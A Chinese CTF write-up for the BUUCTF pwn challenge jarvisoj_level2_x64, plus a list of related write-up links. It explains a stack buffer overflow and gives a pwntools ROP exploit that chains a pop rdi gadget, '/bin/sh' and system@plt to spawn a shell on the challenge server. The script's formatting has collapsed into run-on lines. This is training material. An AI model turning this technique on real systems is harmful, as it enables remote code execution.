buuctf|pwn-jarvisoj_level2_x64-wp
1.例行检查保护机制
只开启了堆保护
2.我们用64位的IDA查看该文件
shift+f12查看关键字符串,我们看到关键字符串“/bin/sh”
我们双击“/bin/sh”,bin/sh的地址为:0x0600A90
3.查看main函数里面的内容
进入vulnerable_function()函数
我们看到buf只有0x80个字节,但是下面read()里面读取了0x200个,这里造成了溢出
4.system("/bin/sh")才能拿到权限
我们找到了“/bin/sh”
所以我们现在来找system
双击_system
我们发现system在plt里面,system地址为:0x04004C0
5.EXP
#encoding = utf-8
from pwn import * context(os = 'linux', arch = 'amd64',log_level = 'debug')
content = 0def main():if content == 1:p = process('level2_x64')else:p = remote('node4.buuoj.cn',25149)#.data:0000000000600A90 hint db '/bin/sh',0bin_addr = 0x0600A90#.plt:00000000004004C0 _system system_addr = 0x04004C0#0x00000000004006b3 : pop rdi ; retpop_rdi_addr = 0x04006b3payload = b'a' * (0x80+0x8) + p64(pop_rdi_addr) + p64(bin_addr) + p64(system_addr)p.recvuntil("Input:")p.sendline(payload)p.interactive()
main()
buuctf|pwn-jarvisoj_level2_x64-wp相关推荐
- BUUCTF PWN rip1 WP
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- BUUCTF Pwn warmup
BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...
- TAMU ctf pwn部分wp+赛后
TAMU ctf pwn部分wp 国外的题目,终端连不上就很gan ga...... Tr*vial 大水题,栈溢出,ret2text exp from pwn import *context(arc ...
- [pwn]星号格式化串:2020网鼎杯白虎组pwn quantum_entanglement wp
[pwn]星号格式化串:2020网鼎杯白虎组pwn quantum_entanglement wp 文章目录 [pwn]星号格式化串:2020网鼎杯白虎组pwn quantum_entanglemen ...
- buuctf pwn bjdctf_2020_babyrop
buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...
- buuctf pwn wp(第四波)格式化字符串漏洞系列
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理.) 这一波题都是无脑AAAA的类型,它 ...
- BUUCTF pwn wp 76 - 80
cmcc_pwnme2 int __cdecl userfunction(char *src) {char dest[108]; // [esp+Ch] [ebp-6Ch] BYREFstrcpy(d ...
- [BUUCTF]PWN——pwnable_orw
pwnable_orw 附件 步骤: 例行检查,32位程序,开启了canary 本地运行一下程序,看看大概的情况,提示我们输入shellcode 32位ida载入,检索字符串,没看见什么可以直接利用的 ...
- 持续更新 BUUCTF——PWN(二)
文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...
最新文章
- 艾伟:WCF从理论到实践(11)-异步
- 六十二、数据结构栈和队列的相互实现
- .NET工资低?那肯定是你打开的方式不正确
- 简明Python教程学习笔记_1_基本
- 初级软考程序员不会c语言,软考程序员初级通过率是多少_软考程序员初级多少分过_上学吧...
- httpclient下载图片或者其他文件
- 【游戏开发实战】教你使用Unity实现录屏生成GIF的功能,录个妹子跳舞的GIF吧
- 单树莓派/双树莓派+USRP+srsLTE分布式搭建4G LTE微基站
- 阿里云Aliplayer视频播放2(断点续播--根据上次播放记录实现续播功能)
- Java项目如何统一日志框架?
- 复盘:智能座舱系列文五- 它的3种交互方式之隐式交互
- 中型仓储货架是使用三立柱货架好,还是使用两立柱货架好?
- 校招前端笔试面试回顾
- 详细设计说明书的书写格式
- Rust之包,箱和模块管理(四):用use关键字引用其他包
- Magic Leap开发指南(9)-- 6 DOF(Unity)
- 错误: 找不到或无法加载主类 com.xxxx.xxx.Application
- Mac版Fork使用(git可视化客户端)
- 网易、华为、美团java工程师社招面经!
- 南邮 OJ 1157 C - 红宝书